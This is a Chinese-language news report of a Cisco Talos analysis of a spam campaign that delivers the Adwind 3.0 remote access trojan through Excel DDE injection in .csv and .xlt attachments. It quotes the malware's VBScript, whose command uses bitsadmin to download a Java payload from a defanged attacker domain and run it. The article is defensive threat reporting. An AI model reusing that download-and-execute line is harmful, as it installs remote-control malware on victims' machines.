思科Talos团队于本周一（9月24日）发布的一篇博文中指出，他们与ReversingLabs最近发现了一场新的垃圾电子邮件活动，该活动正在分发Adwind 3.0远程访问木马（RAT），而目标是三大桌面操作系统Linux、Windows和Mac OSX。 [出自:jiwo.org]

根据Talos团队的说法，这场新的垃圾电子邮件活动最初是由ReversingLabs于9月10日发现的，攻击者使用了Microsoft Excel动态数据交换（DDE）代码注入攻击来感染目标。最终的payload被证实是Adwind RAT的一个变种，而这个变种（即Adwind 3.0）已经升级为能够绕过恶意软件拦截软件的检测。

垃圾电子邮件活动分析

思科Umbrella遥测显示，这场活动开始于2018年8月26日，并在8月28日达到峰值。

Umbrella还显示，75%的请求来自土耳其。但这并没有让Talos团队感到惊讶，因为所有这些垃圾电子邮件均是采用土耳其语编写的。一些目标也位于德国，考虑到德国有一个重要的土耳其社区，这也就不奇怪了。

以下是一封垃圾电子邮件示例，攻击者试图通过一封关于鞋子成本的电子邮件来引诱潜在受害者。

在上面的垃圾电子邮件示例中，我们可以看到一个CSV文件附件。Talos团队表示，还有一些垃圾电子邮件的附件使用的是带有.XLT扩展名的文件。

Microsoft Excel dropper

正如上面所提到的那样，这场活动至少涉及到两种不同版本的dropper，它们分别使用.csv或.xlt扩展名，默认情况下由Microsoft Excel打开。两个版本的dropper的目的都是利用DDE代码注入技术来下载Adwind 3.0。虽然这种注入技术是众所周知的，但Talos团队表示，在他们撰写博文时，被注入的Adwind 3.0仍未被恶意软件拦截软件检测出来。

进一步的分析表明，dropper文件可以是下表中的任何扩展名。在默认情况下，虽然并非所有的文件类型都将由Microsoft Excel打开，但仍然可以通过一个带有这些扩展名之一作为参数的脚本来启动Microsoft Excel，以打开对应的文件。

在这场活动中，注入代码的目的是使用以下内来创建和执行一个VBScript脚本：

Set WXWYKNRG = CreateObject("Wscript.Shell")

WXWYKNRG.Run "cmd /c bitsadmin /transfer 8 /download hxxp://erayinsaat[.]live %temp%\NMUWYTGO.jar&%temp%\NMUWYTGO.jar",0,True

该脚本将使用bitasdmin（微软提供的一种工具，用于下载或上传作业并监控其进度）获取最终的payload。这个payload是一个Java归档文件。

Java payload

Java代码包含一个名为“Allatori Obfuscator version 4.7”的代码混淆器。

Talos团队将经过混淆处理的恶意软件识别为Adwind RAT v3.0。Adwind是一众所周知的多平台RAT，可能有多种配置。Talos团队表示，他们测试的样本被配置为在Windows、Linux和Mac OSX上实现持久性。

Adwind v3.0已经被多个恶意组织所使用过。它允许攻击者执行任何类型的命令、记录击键、捕获屏幕截图、拍照或传输文件。在过去，它曾被用于开展加密货币挖掘活动，并专注于航空业。